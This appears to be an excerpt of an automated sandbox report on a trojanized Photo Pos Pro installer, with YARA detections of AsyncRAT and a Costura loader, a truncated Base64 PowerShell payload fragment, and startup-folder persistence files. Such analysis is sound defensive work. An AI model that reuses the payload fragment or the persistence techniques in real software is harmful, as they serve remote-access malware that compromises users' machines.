                  Source: Binary string: protobuf-net.pdb source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\XmlCfg.pdbg source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: F:\DotNet\workspace\ShellBrowser.NET Nightly\bin\protect\Release\ShellBrowser.pdbpq source: Photo Pos Pro 4.exe, 0000001E.00000002.3109776794.00000202D1012000.00000002.00000001.01000000.00000022.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000002.1872193567.0000000000477000.00000002.00000001.01000000.00000003.sdmp, PhotoPosPro4_SetUp.exe, 00000000.00000000.1693510869.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("ZHGnFxoXFxcbFxcXFhYXF88XFxcXFxcXVxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXlxcXFyU20SUXyyDkOM8YY+Q4a3+AijeHiYZ+iXiEN3p4hYWGizd5fDeJjIU3gIU3W2ZqN4SGe3xFJCQhOxcXFxcXFxdnXBcXYxgaF+
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 29.2.RegAsm.exe.3ada090.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.3ce8610.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.3c08dd8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.3c68e18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.5760000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.3c28df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.5760000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.3ce8610.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.RegAsm.exe.5070000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.3c68e18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.RegAsm.exe.397a090.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001D.00000002.3054270763.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2711123189.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2711123189.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2776743666.0000000005760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.2727036989.0000000002751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.2843790377.0000000005070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.2782140500.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.2982481428.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ebghls.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTR
                  Source: shiA856.tmp.0.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003181D0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_003181D0
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: section name: .didat
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: section name: .fptable
                  Source: shiA856.tmp.0.drStatic PE information: section name: .wpp_sf
                  Source: shiA856.tmp.0.drStatic PE information: section name: .didat
                  Source: MSIA8E4.tmp.0.drStatic PE information: section name: .fptable
                  Source: MSIA9A1.tmp.0.drStatic PE information: section name: .fptable
                  Source: MSIA9FF.tmp.0.drStatic PE information: section name: .fptable
                  Source: preAA3F.tmp.0.drStatic PE information: section name: .didat
                  Source: preAA3F.tmp.0.drStatic PE information: section name: .fptable
                  Source: MSIAD0A.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSIADB6.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSIADF6.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSIAE26.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSIAE65.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSIAEA5.tmp.1.drStatic PE information: section name: .didat
                  Source: MSIAEA5.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSICD6A.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSID50C.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSID78E.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSID82B.tmp.1.drStatic PE information: section name: .fptable
                  Source: dotNetFx40_Client_setup.exe.6.drStatic PE information: section name: .boxld01
                  Source: vcredist_x64.exe.6.drStatic PE information: section name: .wixburn
                  Source: iecore.dll.14.drStatic PE information: section name: .didata
                  Source: ielib64.dll.14.drStatic PE information: section name: _RDATA
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0AFF0051 push es; retf 0_3_0AFF03F6
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0AFF463A push esp; retf 0_3_0AFF463B
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_054031EA push esp; iretd 0_3_054032F1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_054031EA push esp; iretd 0_3_054032F1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0538202F push ecx; ret 0_3_05382071
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0538202F push ecx; ret 0_3_05382071
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_05381943 push ebx; ret 0_3_05381969
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_05381943 push ebx; ret 0_3_05381969
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_053812AA push ebx; ret 0_3_05381969
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_053812AA push ebx; ret 0_3_05381969
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0538398C push eax; ret 0_3_053839E1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0538398C push eax; ret 0_3_053839E1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_05381AC0 push edi; ret 0_3_05381AD1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_05381AC0 push edi; ret 0_3_05381AD1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0538202F push ecx; ret 0_3_05382071
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0538202F push ecx; ret 0_3_05382071
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_05381943 push ebx; ret 0_3_05381969
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_05381943 push ebx; ret 0_3_05381969
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_053812AA push ebx; ret 0_3_05381969
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_053812AA push ebx; ret 0_3_05381969
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0538398C push eax; ret 0_3_053839E1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_0538398C push eax; ret 0_3_053839E1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_05381AC0 push edi; ret 0_3_05381AD1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_3_05381AC0 push edi; ret 0_3_05381AD1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001F289B push 8BFFFFFEh; iretd 0_2_001F28AC
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001BEB19 push eax; retf 0_2_001BEB1D
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001CD1BA push esi; ret 0_2_001CD1BC
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001CF6F0 push ecx; mov dword ptr [esp], ecx0_2_001CF6F1
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_002F1910 push ecx; mov dword ptr [esp], 3F800000h0_2_002F1A6C
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003E1F4A push ecx; ret 0_2_003E1F5D
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_004292A0 push eax; ret 6_2_004292CE

                  Persistence and Installation Behavior

                  barindex
                  Drops executables to the windows directory (C:\Windows) and starts them
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeExecutable created and started: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exe
                  Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSID82B.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAE65.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Users\user\AppData\Local\Temp\aiw5434265.EXEJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICD6A.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.Office2010Black.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Common Files\Thraex Software\AutoUpdator\AutoUpdator.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAD0A.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID82B.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID78E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\PPPNET471service.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.Office2010Silver.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAEA5.tmpJump to dropped file
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeFile created: C:\Users\user\AppData\Local\smcdll.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID50C.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\TelerikCommon.dllJump to dropped file
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\wixstdba.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.RadDock.dllJump to dropped file
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\inst5429125\dotNetFx40_Client_setup.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.UI.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\MSIA8E4.tmpJump to dropped file
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.PowerPacks.Vs.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\PosNetIpLib.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADB6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\ShellBrowser.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Roaming\Photo Pos Pro\Photo Pos Pro 4.12.43\install\56332C6\ProgramFilesFolder\PhotoPosPro4_SetUp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\MSIA9FF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAE26.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\FileDlgExtenders.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\IEvolution2.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\preAA3F.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Windows\Photo Pos Pro 4 Uninstaller.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\PosMessageLib.NET.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeFile created: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.Compatibility.dllJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\MSIA9A1.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADF6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\ielib64.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\iecore.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\shiA856.tmpJump to dropped file
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\SkinSoft.VisualStyler.dllJump to dropped file
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile created: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.VisualStudio2012Dark.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\PXBIPctl.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\ebghls.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAE65.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICD6A.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Windows\Photo Pos Pro 4 Uninstaller.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAD0A.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID82B.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADB6.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID78E.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAEA5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exeFile created: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAE26.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID50C.tmpJump to dropped file
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\wixstdba.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIADF6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PhotoPosPro_PreInstaller.exe.log
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Software License Agreement.rtf
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Software License Agreement.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1028\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1029\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1031\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1036\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1040\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1041\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1042\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1045\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1046\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1049\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1055\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\2052\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\3082\license.rtf

                  Boot Survival

                  barindex
                  Yara detected AsyncRAT
                  Source: Yara matchFile source: 41.2.MSBuild.exe.800000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.2c73d54.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.ebghls.exe.353b338.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 40.2.smcdll.exe.2c73d54.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.ebghls.exe.353b338.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.2602950947.00000000035C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000029.00000002.2632261020.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002CB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.2600796732.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ebghls.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTR
                  Drops PE files to the startup folder
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeJump to dropped file
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smcdll.vbsJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smcdll.vbs

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
